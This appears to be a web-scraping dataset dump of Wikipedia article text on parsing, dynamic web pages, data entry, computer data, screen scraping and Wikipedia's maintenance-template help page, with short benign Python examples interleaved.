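import ast

valid = "x = 1\nprint(x)"
questionable = "x = 1\nprint(y)"   # y is never initialized

# Both are accepted by the context-free (syntactic) layer and yield trees of the same shape.
print(ast.dump(ast.parse(valid)))
print(ast.dump(ast.parse(questionable)))

# The semantic problem only surfaces when the second program is actually run.
try:
    exec(questionable, {})
except NameError as err:
    print("semantic/runtime error:", err)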
18 Some graphical parsing algorithms have been designed for visual programming languages. 22 23 Parsers for visual languages are sometimes based on graph grammars. 24 Adaptive parsing algorithms have been used to construct "self-extending" natural language user interfaces. 25 A simple parser implementation reads the entire input file, performs an intermediate computation or translation, and then writes the entire output file, such as in-memory multi-pass compilers. Alternative parser implementation approaches: Some of the well-known parser development tools include the following: Lookahead establishes the maximum number of incoming tokens that a parser can use to decide which rule it should apply. Lookahead is especially relevant to LL, LR, and LALR parsers, where it is often explicitly indicated by affixing the lookahead to the algorithm name in parentheses, such as LALR(1). Most programming languages, the primary target of parsers, are carefully defined in such a way that a parser with limited lookahead, typically one token, can parse them, because parsers with limited lookahead are often more efficient. One important change to this trend came in 1990 when Terence Parr created ANTLR for his Ph.D. thesis, a parser generator for efficient LL(k) parsers, where k is any fixed value. LR parsers typically have only a few actions after seeing each token: shift (add this token to the stack for later reduction), reduce (pop tokens from the stack and form a syntactic construct), end, error (no known rule applies), or conflict (does not know whether to shift or reduce). Lookahead has two advantages. Example: parsing the expression 1 + 2 * 3. Most programming languages (except for a few such as APL and Smalltalk) and algebraic formulas give higher precedence to multiplication than to addition, in which case the correct interpretation of the example above is 1 + (2 * 3). Note that Rule4 above is a semantic rule. It is possible to rewrite the grammar to incorporate this into the syntax; however, not all such rules can be translated into syntax. Initially, the input is the token sequence 1, +, 2, *, 3. Without lookahead, the parse tree and the code resulting from it are not correct according to the language semantics. To correctly parse without lookahead, there are three solutions: The parse tree generated with lookahead is correct and simply more efficient than that of non-lookahead parsers. This is the strategy followed in LALR parsers. |
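To make the lookahead and precedence discussion concrete, here is an illustrative precedence-climbing evaluator for token lists such as 1, +, 2, *, 3. It inspects a single upcoming token (one-token lookahead) to decide whether to keep extending the current sub-expression; it is a sketch, not the output of any particular parser generator.

# Illustrative one-token-lookahead, precedence-climbing expression evaluator.
PRECEDENCE = {"+": 1, "-": 1, "*": 2, "/": 2}

def evaluate(tokens, min_prec=1):
    """tokens is a list of numbers and operator strings; it is consumed left to right."""
    result = tokens.pop(0)            # first operand
    while tokens and PRECEDENCE.get(tokens[0], 0) >= min_prec:
        op = tokens.pop(0)            # the single lookahead token decides this step
        # Operands of a higher-precedence operator bind more tightly,
        # so parse the right-hand side at precedence PRECEDENCE[op] + 1.
        rhs = evaluate(tokens, PRECEDENCE[op] + 1)
        if op == "+": result += rhs
        elif op == "-": result -= rhs
        elif op == "*": result *= rhs
        elif op == "/": result /= rhs
    return result

print(evaluate([1, "+", 2, "*", 3]))   # 7, i.e. 1 + (2 * 3)
print(evaluate([1, "*", 2, "+", 3]))   # 5, i.e. (1 * 2) + 3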
86 | https://en.wikipedia.org/wiki/Web_scraping | https://ru.wikipedia.org/wiki/%D0%92%D0%B5%D0%B1-%D1%81%D0%BA%D1%80%D0%B5%D0%B9%D0%BF%D0%B8%D0%BD%D0%B3 | [Russian-language Wikipedia article on web scraping; the Cyrillic text was stripped during extraction and only isolated fragments remain. Surviving fragments refer to GET requests, parsing HTML/XHTML, UNIX grep, Perl and Python, XQuery and HTQL, the Document Object Model (Internet Explorer, Mozilla), APIs and DaaS offerings, tools such as Scrapy, Import.IO, Nokogiri (Ruby) and Outwit Hub, JSON output, Amazon AWS and Google API discovery services, countermeasures based on IP addresses and User-Agent strings, a Russian data-protection law of 27 July 2006 (No. 152), the GDPR, and a 2020 CNIL ruling.] |
87 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Dynamic_web_page | A dynamic web page is a web page constructed at runtime (during software execution), as opposed to a static web page, delivered as it is stored. A server-side dynamic web page is a web page whose construction is controlled by an application server processing server-side scripts. 1 In server-side scripting, parameters determine how the assembly of every new web page proceeds, and including the setting up of more client-side processing. A client-side dynamic web page processes the web page using JavaScript running in the browser as it loads. JavaScript can interact with the page via Document Object Model (DOM), to query page state and modify it. Even though a web page can be dynamic on the client-side, it can still be hosted on a static hosting service such as GitHub Pages or Amazon S3 as long as there is not any server-side code included. A dynamic web page is then reloaded by the user or by a computer program to change some variable content. The updating information could come from the server, or from changes made to that page's DOM. This may or may not truncate the browsing history or create a saved version to go back to, but a dynamic web page update using AJAX technologies will neither create a page to go back to, nor truncate the web browsing history forward of the displayed page. Using AJAX, the end user gets one dynamic page managed as a single page in the web browser while the actual web content rendered on that page can vary. The AJAX engine sits only on the browser requesting parts of its DOM, the DOM, for its client, from an application server. A particular application server could offer a standardized REST style interface to offer services to the web application. 2 DHTML is the umbrella term for technologies and methods used to create web pages that are not static web pages, though it has fallen out of common use since the popularization of AJAX, a term which is now itself rarely used. Client-side-scripting, server-side scripting, or a combination of these make for the dynamic web experience in a browser. Classical hypertext navigation, with HTML or XHTML alone, provides "static" content, meaning that the user requests a web page and simply views the page and the information on that page. However, a web page can also provide a "live", "dynamic", or "interactive" user experience. Content (text, images, form fields, etc.) on a web page can change, in response to different contexts or conditions. There are two ways to create this kind of effect: Web pages that use client-side scripting must use presentation technology broadly called rich interfaced pages. Client-side scripting languages like JavaScript or ActionScript, used for Dynamic HTML (DHTML) and Flash technologies respectively, are frequently used to orchestrate media types (sound, animations, changing text, etc.) of the presentation. The scripting also allows use of remote scripting, a technique by which the DHTML page requests additional information from a server, using a hidden Frame, XMLHttpRequests, or a web service. Web pages that use server-side scripting are often created with the help of server-side languages such as PHP, Perl, ASP, JSP, ColdFusion and other languages. These server-side languages typically use the Common Gateway Interface (CGI) to produce dynamic web pages. These kinds of pages can also use, on the client-side, the first kind (DHTML, etc.). 
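In the scraping context of this notebook, the server-side/client-side distinction above matters in practice: a plain HTTP fetch with requests only returns the HTML the server rendered, not anything the page's JavaScript builds afterwards. A brief sketch, with a placeholder URL:

# Sketch: a plain HTTP fetch sees only server-rendered HTML, not client-side DOM changes.
# The URL below is a placeholder for illustration.
import requests
from bs4 import BeautifulSoup

url = "https://example.com/some-page"
response = requests.get(url, timeout=10)
soup = BeautifulSoup(response.text, "html5lib")

# Content generated in the browser by JavaScript/AJAX after load will NOT appear in response.text;
# scraping such pages usually means calling the underlying data endpoint directly
# or driving a real (headless) browser instead.
print(soup.title.get_text() if soup.title else "no <title> in server-rendered HTML")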
It is difficult to be precise about "dynamic web page beginnings" or chronology because the precise concept makes sense only after the "widespread development of web pages". HTTP has existed since 1989, HTML, publicly standardized since 1996. The web browser's rise in popularity started with Mosaic in 1993. Between 1995 and 1996, multiple dynamic web products were introduced to the market, including Coldfusion, WebObjects, PHP, and Active Server Pages. The introduction of JavaScript (then known as LiveScript) enabled the production of client-side dynamic web pages, with JavaScript code executed in the client's browser. 4 The letter "J" in the term AJAX originally indicated the use of JavaScript, as well as XML. With the rise of server side JavaScript processing, for example, Node.js, originally developed in 2009, JavaScript is also used to dynamically create pages on the server that are sent fully formed to clients. MediaWiki, the content management system that powers Wikipedia, is an example for an originally server-side dynamic web page, interacted with through form submissions and URL parameters. Throughout time, progressively enhancing extensions such as the visual editor have also added elements that are dynamic on the client side, while the original dynamic server-side elements such as the classic edit form remain available to be fallen back on (graceful degradation) in case of error or incompatibility. A program running on a web server (server-side scripting) is used to generate the web content on various web pages, manage user sessions, and control workflow. Server responses may be determined by such conditions as data in a posted HTML form, parameters in the URL, the type of browser being used, the passage of time, or a database or server state. Such web pages are often created with the help of server-side languages such as ASP, ColdFusion, Go, JavaScript, Perl, PHP, Ruby, Python, WebDNA and other languages, by a support server that can run on the same hardware as the web server. These server-side languages often use the Common Gateway Interface (CGI) to produce dynamic web pages. Two notable exceptions are ASP.NET, and JSP, which reuse CGI concepts in their APIs but actually dispatch all web requests into a shared virtual machine. The server-side languages are used to embed tags or markers within the source file of the web page on the web server. 5 When a user on a client computer requests that web page, the web server interprets these tags or markers to perform actions on the server. For example, the server may be instructed to insert information from a database or information such as the current date. Dynamic web pages are often cached when there are few or no changes expected and the page is anticipated to receive considerable amount of web traffic that would wastefully strain the server and slow down page loading if it had to generate the pages on the fly for each request. Client-side scripting is changing interface behaviors within a specific web page in response to input device actions, or at specified timing events. In this case, the dynamic behavior occurs within the presentation. The client-side content is generated on the user's local computer system. 6 Such web pages use presentation technology called rich interfaced pages. Client-side scripting languages like JavaScript or ActionScript, used for Dynamic HTML (DHTML) and Flash technologies respectively, are frequently used to orchestrate media types (sound, animations, changing text, etc.) of the presentation. 
Client-side scripting also allows the use of remote scripting, a technique by which the DHTML page requests additional information from a server, using a hidden frame, XMLHttpRequests, or a Web service. The first public use of JavaScript was in 1995, when the language was implemented in Netscape Navigator 2, standardized as ECMAScript two years later. 7 The client-side content is generated on the client's computer. The web browser retrieves a page from the server, then processes the code embedded in the page (typically written in JavaScript) and displays the retrieved page's content to the user. 8 The innerHTML property (or write command) can illustrate the client-side dynamic page generation: two distinct pages, A and B, can be regenerated (by an "event response dynamic") as document.innerHTML A and document.innerHTML B; or "on load dynamic" by document.write(A) and document.write(B). All of the client and server components that collectively build a dynamic web page are called a web application. Web applications manage user interactions, state, security, and performance. 9 Ajax uses a combination of both client-side scripting and server-side requests. It is a web application development technique for dynamically interchanging content, and it sends requests to the server for data in order to do so. The server returns the requested data which is then processed by a client-side script. This technique can reduce server load time because the client does not request the entire webpage to be regenerated by the server's language parser; only the content that will change is transmitted. Google Maps is an example of a web application that uses Ajax techniques. A web client, such as a web browser, can act as its own server, accessing data from many different servers, such as Gopher, FTP, NNTP (Usenet) and HTTP, to build a page. HTTP supports uploading documents from the client back to the server. There are several HTTP methods for doing this. |
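For scrapers, the AJAX pattern described above often means the interesting data arrives as JSON from a separate endpoint, which can sometimes be requested directly instead of rendering the page. The endpoint URL below is hypothetical; the real one would be found in the browser's developer tools.

# Sketch: fetching the JSON endpoint an AJAX page would call (endpoint URL is hypothetical).
import requests
import pandas as pd

api_url = "https://example.com/api/items"   # placeholder; locate the real endpoint in dev tools
response = requests.get(api_url, timeout=10)
response.raise_for_status()

data = response.json()                      # the same payload the page's JavaScript would consume
df = pd.DataFrame(data)                     # assumes the endpoint returns a list of records
print(df.head())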
89 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_entry_clerk | A data entry clerk, also known as data preparation and control operator, data registration and control operator, and data preparation and registration operator, is a member of staff employed to enter or update data into a computer system. 1 2 Data is often entered into a computer from paper documents 3 using a keyboard. 4 The keyboards used can often have special keys and multiple colors to help in the task and speed up the work. 5 Proper ergonomics at the workstation is a common topic considered. 6 7 8 The data entry clerk may also use a mouse, 9 10 and a manually-fed scanner may be involved. 11 Speed and accuracy, not necessarily in that order, are the key measures of the job. 12 The invention of punched card data processing in the 1890s created a demand for many workers, typically women, to run keypunch machines. To ensure accuracy, data was often entered twice; the second time a different keyboarding device, known as a verifier (such as the IBM 056) was used. In the 1970s, punched card data entry was gradually replaced by the use of video display terminals. For a mailing company, data entry clerks might be required to type in reference numbers for items of mail which had failed to reach their destination, so that the relevant addresses could be deleted from the database used to send the mail out. If the company was compiling a database from addresses handwritten on a questionnaire, the person typing those into the database would be a data entry clerk. In a cash office, a data entry clerk might be required to type expenses into a database using numerical codes. With to the advance of technology, many data entry clerks no longer work with hand-written documents. Instead, the documents are first scanned by a combined OCR OMR system (optical character recognition and optical mark recognition,) which attempts to read the documents and process the data electronically. The accuracy of OCR varies widely based upon the quality of the original document as well as the scanned image; hence the ongoing need for data entry clerks. Although OCR technology is continually being developed, many tasks still require a data entry clerk to review the results afterward to check the accuracy of the data and to manually key in any missed or incorrect information. 13 An example of this system would be one commonly used to document health insurance claims, such as for Medicaid in the United States. In many systems, the hand-written forms are first scanned into digital images (JPEG, PNG, bitmap, etc.). These files are then processed by the optical character recognition system, where many fields are completed by the computerized optical scanner. When the OCR software has low confidence in a data field, it is flagged for review not the entire record but just the single field. The data entry clerk then manually reviews the data already entered by OCR, corrects it if needed, and fills in any missing data 13 by simultaneously viewing the image on-screen. The accuracy of personal records, as well as billing or financial information, is usually very important to the general public as well as the healthcare provider. Sensitive or vital information such as this is often checked many times, by both clerk and machine, before being accepted. Accuracy is usually more important than speed, because detection and correction of errors can be very time-consuming. 12 Staying focused and speed are also required. 
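The review workflow described above, in which OCR fills most fields and only low-confidence ones are routed to a clerk, can be sketched in a few lines. The field names, confidence scores, and threshold are all invented for illustration.

# Illustrative sketch of routing low-confidence OCR fields to manual review
# (field names, confidences, and the threshold are hypothetical).
ocr_record = {
    "patient_name": {"value": "J0hn Smith", "confidence": 0.62},
    "claim_amount": {"value": "125.00", "confidence": 0.97},
    "service_date": {"value": "2016-03-14", "confidence": 0.91},
}
REVIEW_THRESHOLD = 0.90

needs_review = {field: data for field, data in ocr_record.items()
                if data["confidence"] < REVIEW_THRESHOLD}

# Only the flagged fields, not the whole record, would be shown to the data entry clerk.
for field, data in needs_review.items():
    print(f"Review {field!r}: OCR read {data['value']!r} with confidence {data['confidence']:.2f}")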
14 13 The job is usually low-skilled, so veteran staff are often employed on a temporary basis after a large survey or census has been completed. However, most companies handling large amounts of data on a regular basis will spread the contracts and workload across the year and will hire part-time. The role of data entry clerks working with physical hand-written documents is on the decline in the developed world, because employees within a company frequently enter their own data, as it is collected now, instead of having a different employee do this task. An example of this is an operator working in a call center or a cashier in a shop. Cost is another reason for the decline. Data entry is labor-intensive for large batches and therefore expensive, so large companies will sometimes outsource the work, either locally or to third-world countries where there is no shortage of cheaper unskilled labor. 15 16 17 As of 2016 update , the median pay was between $19,396 and $34,990 in the United States. 18 As of 2018 update , The New York Times was still carrying ads for the job title Data Entry Clerk. 19 20 For the job as a data entry clerk, competent math and English skills may be necessary. 21 The worker will need to be very familiar with office software such as word processors, databases, and spreadsheets. 21 18 One must have quickness, focus, and customer service skills. 21 Education higher than a high school diploma is often not required, but some companies require a bachelor's degree. 18 Companies also hope the worker will have one year of experience in a related field. 18 |
90 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_(computer_science) | In computer science, data (treated as singular, plural, or as a mass noun) is any sequence of one or more symbols; datum is a single symbol of data. Data requires interpretation to become information. Digital data is data that is represented using the binary number system of ones (1) and zeros (0), instead of analog representation. In modern (post 1960) computer systems, all data is digital. Data exists in three states: data at rest, data in transit and data in use. Data within a computer, in most cases, moves as parallel data. Data moving to or from a computer, in most cases, moves as serial data. Data sourced from an analog device, such as a temperature sensor, may be converted to digital using an analog-to-digital converter. Data representing quantities, characters, or symbols on which operations are performed by a computer are stored and recorded on magnetic, optical, electronic, or mechanical recording media, and transmitted in the form of digital electrical or optical signals. 1 Data pass in and out of computers via peripheral devices. Physical computer memory elements consist of an address and a byte word of data storage. Digital data are often stored in relational databases, like tables or SQL databases, and can generally be represented as abstract key value pairs. Data can be organized in many different types of data structures, including arrays, graphs, and objects. Data structures can store data of many different types, including numbers, strings and even other data structures. Metadata helps translate data to information. Metadata is data about the data. Metadata may be implied, specified or given. Data relating to physical events or processes will have a temporal component. This temporal component may be implied. This is the case when a device such as a temperature logger receives data from a temperature sensor. When the temperature is received it is assumed that the data has a temporal reference of now. So the device records the date, time and temperature together. When the data logger communicates temperatures, it must also report the date and time as metadata for each temperature reading. Fundamentally, computers follow a sequence of instructions they are given in the form of data. A set of instructions to perform a given task (or tasks) is called a program. A program is data in the form of coded instructions to control the operation of a computer or other machine. 2 In the nominal case, the program, as executed by the computer, will consist of machine code. The elements of storage manipulated by the program, but not actually executed by the central processing unit (CPU), are also data. At its most essential, a single datum is a value stored at a specific location. Therefore, it is possible for computer programs to operate on other computer programs, by manipulating their programmatic data. To store data bytes in a file, they have to be serialized in a file format. Typically, programs are stored in special file types, different from those used for other data. Executable files contain programs; all other files are also data files. However, executable files may also contain data used by the program which is built into the program. In particular, some executable files have a data segment, which nominally contains constants and initial values for variables, both of which can be considered data. The line between program and data can become blurry. 
An interpreter, for example, is a program. The input data to an interpreter is itself a program, just not one expressed in native machine language. In many cases, the interpreted program will be a human-readable text file, which is manipulated with a text editor program. Metaprogramming similarly involves programs manipulating other programs as data. Programs like compilers, linkers, debuggers, program updaters, virus scanners and such use other programs as their data. For example, a user might first instruct the operating system to load a word processor program from one file, and then use the running program to open and edit a document stored in another file. In this example, the document would be considered data. If the word processor also features a spell checker, then the dictionary (word list) for the spell checker would also be considered data. The algorithms used by the spell checker to suggest corrections would be either machine code data or text in some interpretable programming language. In an alternate usage, binary files (which are not human-readable) are sometimes called data as distinguished from human-readable text. 3 The total amount of digital data in 2007 was estimated to be 281 billion gigabytes (281 exabytes). 4 5 Keys in data provide the context for values. Regardless of the structure of data, there is always a key component present. Keys in data and data-structures are essential for giving meaning to data values. Without a key that is directly or indirectly associated with a value, or collection of values in a structure, the values become meaningless and cease to be data. That is to say, there has to be a key component linked to a value component in order for it to be considered data. citation needed Data can be represented in computers in multiple ways, as per the following examples: It is only after instantiation that an object of a specified class exists. After an object's reference is cleared, the object also ceases to exist. The memory locations where the object's data was stored are garbage and are reclassified as unused memory available for reuse. |
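The idea above, that a program is just data until it is executed, can be shown directly in Python, where source code held as a string can be compiled and run. A minimal sketch (the function defined here is, of course, hypothetical):

# Minimal sketch: treating a program as data, then as executable code.
source = "def greet(name):\n    return f'Hello, {name}!'"   # a program held as a plain string

code_object = compile(source, filename="<generated>", mode="exec")   # still data: a code object
namespace = {}
exec(code_object, namespace)                                  # now it runs and defines greet()

print(namespace["greet"]("data"))                             # Hello, data!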
91 | https://en.wikipedia.org/wiki/Data_scraping | https://fr.wikipedia.org/wiki/Capture_de_donn%C3%A9es_d%27%C3%A9cran | Screen scraping ("capture de données d'écran") 1 is a technique by which a program retrieves data normally intended to be displayed by a video output device (generally a monitor) in order to extract information from it. The target is often a web page from which information is to be retrieved, but it can equally be any other form of information that is formatted primarily to be displayed on a screen. It can also be information destined for a text terminal, or for the screen of a mobile phone on which the information can be analyzed after having been displayed there by another application. |
94 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Help:Maintenance_template_removal | Many Wikipedia pages display maintenance templates that identify problems. You may have arrived at this help page after clicking a link on a maintenance template saying "Learn how and when to remove this template message". Maintenance templates are added and removed by volunteers. This help page explains the process for examining and removing such templates. Maintenance templates (or "tags") are not removed automatically. Even if you fix the issue(s) described in a maintenance template, the tag will remain in the article until you or someone else manually removes it. The mechanics of removal are usually as simple as clicking "Edit" at the top of the page or in the section involved (if you're not already in edit mode), removing the code that produces the display of the template, leaving an edit summary, and saving the page. It is not okay to remove maintenance templates until the issue flagged by the template is remedied first—that is, until the maintenance tag is no longer valid—unless it truly did not belong in the first place. Wikipedia works because of the efforts of volunteers just like you, making bold edits to help build this encyclopedia. Fixing problems and then removing maintenance templates when you are done is important in that effort. We don't know which maintenance tag brought you to this page, and thus what specific problem needs attention. However, every maintenance template contains links to help pages, policies, guidelines, or other relevant pages that provide information on the problem the template was placed to flag. You will also find guidance on some of the more common templates below. Many common templates address problems with article citations and references, or their lack because reliable sourcing is the lifeblood of Wikipedia articles and at the core of all of Wikipedia's content policies and guidelines, such as notability, verifiability, neutral point of view, and no original research. But a host of other issues may be flagged, including tone and style of writing, structure, and formatting, lack of links to or from other articles, compliance with Wikipedia's manual of style and the lack of a lead section. Please make sure the issue has been resolved before removing the template. That does require some effort on your part—to understand both the problem and how to solve it. If the issue flagged by the maintenance template is that the article contains no references, a citation needed template used might be Unreferenced typically placed by the code you would see when wikitext (source) editing: Unreferenced date August 2024 . It is important to understand that what you see when reading an article, and what you see when editing it, are different unless you're in Visual editing mode. Thus, the above code, only seen when doing source editing, results in the display of the 'called' template below: This template contains several links, indicated by the words and phrases in blue. Three of these links are to pages that, when explored, provide context and resources for you to understand why the template was placed on the page, and how to address the issue of the article being unreferenced: Whatever maintenance tag brought you to this help page should likewise contain relevant explanatory links addressed to whatever its issue is. Read these explanatory and contextual pages to learn about the problem and what it is you need to do to take care of it. 
Again, some of the more common maintenance templates seen are addressed in the specific template guidance section below. Maintenance templates are not meant to be in articles permanently. Any user without a conflict of interest may remove a maintenance template in any of the following circumstances: You should not remove maintenance templates if any of the following apply: Have you carefully read the help pages and thoroughly fixed the problem? Or have you made a considered decision that the template is not, or is no longer, applicable? Great Now, to remove the maintenance template: That's it. Thank you Problems flagged by some templates may imply secondary problems that will still exist after you take care of the main issue. In such cases, it may be more appropriate to switch the template to another applicable one following your edits, rather than just removing it. The reasoning behind the change in templates should be addressed in the edit summary. A case in point is the Unreferenced template example used above. It is placed on pages with no references. Thus, adding just one suitable reference renders that maintenance template inapplicable. However, that change does not take care of the overarching issue of poor sourcing. In this example, a change to a different template may be appropriate, depending on the type, quality, depth, and manner of sourcing added to fix the issue, such as refimprove , No footnotes , Primary sources , or one of the many others listed at Wikipedia:Template messages Sources of articles. Conversely, some templates flag highly discrete issues where there is no need to consider a switch to another template. For example, if an article is "orphaned" no other articles in the main article namespace link to it then once that is taken care of (by the addition of links to it from other articles), the issue is gone entirely and the tag's removal is unambiguous. When a flagged issue has been addressed in parts of an article but remains in discrete sections, clarity may be served by replacing the template with a section variant, or by use of inline cleanup tags, if such versions of the template exist. In some cases, it may be helpful to request a review of a maintenance template's removal or proposed removal with the editor who initially added it to the article at issue. This section guides you on how to address some of the more common specific templates that may have brought you to this help page. More detailed information about the templates can be found by following the links to the templates themselves. Click "show" at the right to display the instructions. Some articles will be flagged for multiple discrete problems using a single template: Multiple issues . If you take care of one or more problems that it flags but not all, do not remove the template entirely but just those parameters in it that you have fixed. The example below shows three different issues flagged by this template: If you address the "orphaning" issue, but not the other two, remove just the line that flagged the orphan issue and leave the others intact. Thus, your removal would leave the template in this state. See the sections below for how to address some of the more common problems flagged by templates that may be wrapped into this template. All of Wikipedia's core content policies and guidelines have as a common denominator the need for reliable sourcing. 
For example, the content of Wikipedia articles must be verifiable in reliable sources; the notability of a topic must be demonstrated through such reliable sources that are secondary in nature, which are independent of the topic and treat the subject in substantive detail (not just "mere mentions"); and to establish that the content is not original research, the sources cited must directly support the material being presented without analysis or synthesis to reach or imply a conclusion that is not stated in the sources.
Unreferenced, typically placed by the code {{Unreferenced|date=August 2024}} and having redirects such as Unsourced, Unverified, No references, No sources, and Unref, flags the issue of an article containing no references at all. This template no longer applies once a single reference appears in the article, whether placed through the preferred method of inline citations, in a general references section, or even through such a poor method as an embedded raw link. To address the issue, add citations to reliable sources. Because of their importance, Wikipedia contains numerous instruction pages on aspects of referencing. We suggest starting with Help:Referencing for beginners and Help:Introduction to referencing 1, and then seeing Wikipedia:Citing sources for a more involved treatment, noting that each contains "see also" sections linking to additional help pages, guides, and tutorials. A visual guide to placing inline citations through <ref>...</ref> tags may also help. In brief, anywhere you want a footnote to appear in a piece of text, you place an opening <ref> tag followed by the text of the citation which you want to appear at the bottom of the article, and close with a </ref> tag; note the closing slash. For multiple uses of a single reference, the opening tag is given a name, like so: <ref name="name">, followed by the citation text and a closing </ref> tag. Each time you want to use that footnote again, you simply reuse the first element with a slash, like so: <ref name="name" />. For these references to appear, you must tell the software where to display them, using either the code <references /> or, most commonly, the template {{Reflist}}, which can be modified to display the references in columns using {{Reflist|colwidth=30em}}. Per our style guidelines, the references should be displayed in a separate section denominated "References" located after the body of the article. For example, the wikitext "Multiple<ref name="multiple">Citation text.</ref> citation<ref name="multiple" /> use." followed by a References section containing {{Reflist}} displays the footnote once and reuses it for each occurrence; the citation text itself can be formatted with templates such as {{Citation}}, {{Cite web}}, {{Cite book}}, {{Cite news}} and {{Cite journal}}. As noted higher on this page, unless you thoroughly source a page in response to this template, it may be more appropriate to switch this template for a more specific one rather than simply removing it. Depending on the type, quality, depth, and manner of sourcing added to fix the issue, you might replace it with {{Refimprove}}, {{No footnotes}}, {{Primary sources}} or a host of others listed at Wikipedia:Template messages/Sources of articles. All of Wikipedia's core content policies and guidelines have as a common denominator the need for reliable sourcing, as described above.
Refimprove, typically placed by the code {{Refimprove|date=August 2024}} and having redirects such as Improve references, Verify, More sources and Citations needed, flags the issue of an article that has some, but insufficient, inline citations to support the material currently in the article. It should not be used for articles with no sources at all ({{Unreferenced}} should be used instead), nor for articles without inline citations but which contain some sources ({{No footnotes}} should be used instead), nor for an article on living persons ({{BLP sources}} should be used instead). This template no longer applies once an article has been made fairly well-sourced. To address the issue, add additional inline citations to reliable sources for all significant statements in the article. Whether or not an article has been rendered "fairly well sourced" may involve a judgment call, but in any event the sources used must be reliable ones, and articles should not rely predominantly on primary sources, but rather on secondary sources. Note the minimum: all quotations, material whose verifiability has been challenged or is likely to be challenged, and contentious material, whether negative, positive, or neutral, about living persons, must include an inline citation that directly supports the material.
No footnotes, typically placed by the code {{No footnotes|date=August 2024}} and having redirects such as Citations, No citations, Inline citations and No inline citations, flags the issue of an article that contains some form of sourcing but lacks the precision of inline citations to associate given portions of material with the specific reliable sources that support that material. Inline citations make verifiability accessible: in the absence of an inline citation that associates specific material with a specific source, it becomes very difficult for a reader to check which sources, given only in some general manner, verify which items of content. To address the issue, add inline citations to reliable sources, ideally for all significant statements in the article. Note that, at a minimum, all quotations, material whose verifiability has been challenged or is likely to be challenged, and contentious material, whether negative, positive, or neutral, about living persons, must include an inline citation that directly supports the material. There are many instruction pages that directly and indirectly give guidance on adding inline citations; see the help pages and the visual guide to <ref>...</ref> tags described above under Unreferenced.
Primary sources, typically placed by the code {{Primary sources|date=August 2024}} and having among other redirects Primary, flags the issue of an article that relies too heavily on primary sources (original materials that are close to an event, often accounts written by people who are directly involved) as opposed to secondary and, to some extent, tertiary sources. Primary sources have their place, but they must be used carefully and are easy to misuse. Typically, they should only be used for straightforward, descriptive statements of fact that can be verified by any educated person with access to the primary source but without further, specialized knowledge. They should not be used to support content that presents interpretation, analysis, evaluation, or synthesis, and should not be the predominant form of sourcing in an article. Moreover, primary sources are generally not useful for demonstrating a topic's notability. To address the issue, add citations predominantly to secondary sources. Often this involves replacing some of the primary sources with secondary sources rather than just adding them alongside existing ones, especially where the primary source is being used for an invalid purpose such as interpretive claims and synthesis. Finding secondary sources is a large topic, but make use of Google Books, News, and Scholar; find local newspaper archives; go to a library; if you have access, use pay subscription services like JSTOR, Newspaperarchive.com, Ancestry.com, etc.; see our guide on free English newspaper sources and others listed here; and request access to pay subscription sources at WP:RX.
If insufficient reliable secondary and independent sources exist treating a topic in substantive detail, then Wikipedia should not have an article on the topic. Remember that no amount of editing can overcome a lack of notability. Wikipedia is an encyclopedia, a specific type of reference work properly containing articles on topics of knowledge. Wikipedia employs the concept of notability to avoid indiscriminate inclusion of topics by attempting to ensure that the subjects of articles are "worthy of notice" by only including articles on topics that the world has taken note of by substantively treating them in reliable sources unconnected with the topic. The general notability standard thus presumes that topics are notable if they have "received significant coverage in reliable sources that are independent of the subject". Notability , typically placed by the code Notability date August 2024 , having redirects such as Notable , Non-notable , Nn and Significance , and displaying when reading as: (or some variation linking to one of the subject-specific notability guidelines) questions whether a topic is notable. As stated in the template, addressing the issue requires adding citations to reliable secondary sources. There are several common mistakes seen in addressing this issue: If insufficient reliable secondary and independent sources exist treating a topic in substantive detail, then Wikipedia should not have an article on the topic. Remember that no amount of editing can overcome a lack of notability. Advert , typically placed by the code Advert date August 2024 , and having redirects such as Advertisement , Advertising , Ad and Puff , and displaying when reading as: flags the issue of an article that reads like an advertisement. For example, such articles may tell users to buy a company's product, provide price lists, give links to online sellers, use unencyclopedic or meaningless buzzwords, be filled with peacock language and read like the website of the article's topic or a press release touting its virtues, rather than that of a neutrally-written encyclopedia article about the topic. Advertisements are by no means limited to commercial topics and indeed are often seen for all manner of others, such as "noble causes", religious spiritual leaders, sports teams, gaming clans and so forth. If the article's main problem is not advertising per se, then you can change the tag to something more appropriate, such as COI or Peacock or POV check . Pages that are exclusively promotional and would need to be fundamentally rewritten to become encyclopedic may be tagged for speedy deletion under section G11 of the criteria using db-g11 or db-spam . To address the issue, rewrite the article from a neutral point of view which is not just about the wording and tone, but also what the article covers and what it does not cover. Wikipedia articles should represent fairly, proportionately, and, as far as possible, without editorial bias, all of the significant views that have been published by reliable sources on a topic. Removing all promotional language is a good start, but depending on what is left, may only be a surface treatment. See what you can salvage, but often editors strip out all but the most basic content, leaving it in a stub state. If you want to build a solid article, explore the existence of independent sources for the topic, and build it from the ground up. 
POV , typically placed by the code POV date August 2024 , and having redirects such as NPOV , POV dispute , Neutrality , Neutral and Not neutral , and displaying when reading as: flags the issue of an article that has been identified as having a serious issue of balance, the lack of a neutral point of view, and the tagger wishes to attract editors with different viewpoints to the article. An unbalanced or non-neutral article does not fairly represent the balance of perspectives of high-quality, reliable secondary sources. This tag is meant to be accompanied by an explanation on the article's talk page about why it was added, identifying specific issues that are actionable within Wikipedia's content policies. This template is not meant to be a permanent resident on any article. You may remove this template whenever any one of the following is true: Lead missing , typically placed by the code Lead missing date August 2024 , and having redirects such as No lead , Nointro , No lead section , Lead absent and Intro needed , and displaying when reading as: flags the issue of an article that fails to follow Wikipedia's standard article layout guidelines by introducing the reader to the topic in a lead section containing a summary of the most important article contents. The lead should stand on its own as a concise overview of the article's topic. A good lead section cultivates the reader's interest in reading more of the article, but not by teasing the reader or hinting at content that follows. It should identify the topic, establish context, explain why the topic is notable, and summarize the most important points, including any prominent controversies. To address the issue, write a lead section. The size of an appropriate lead will depend on the breadth of the article but it should be no more than four well-composed paragraphs, and should generally not contain content that is not already present in the body of the article. Current , typically placed by the code Current date August 2024 , and displaying when reading as: (or a subject-specific variation listed on Wikipedia:Current event templates) warns editors and readers about an article that is the subject of a current event, such as a breaking news story, that is accordingly experiencing a great flux of edits and is in a fast-changing state. Wikipedia attracts numerous editors who want to update articles in real time immediately after such current events are published. However, sources for breaking news reports often contain serious 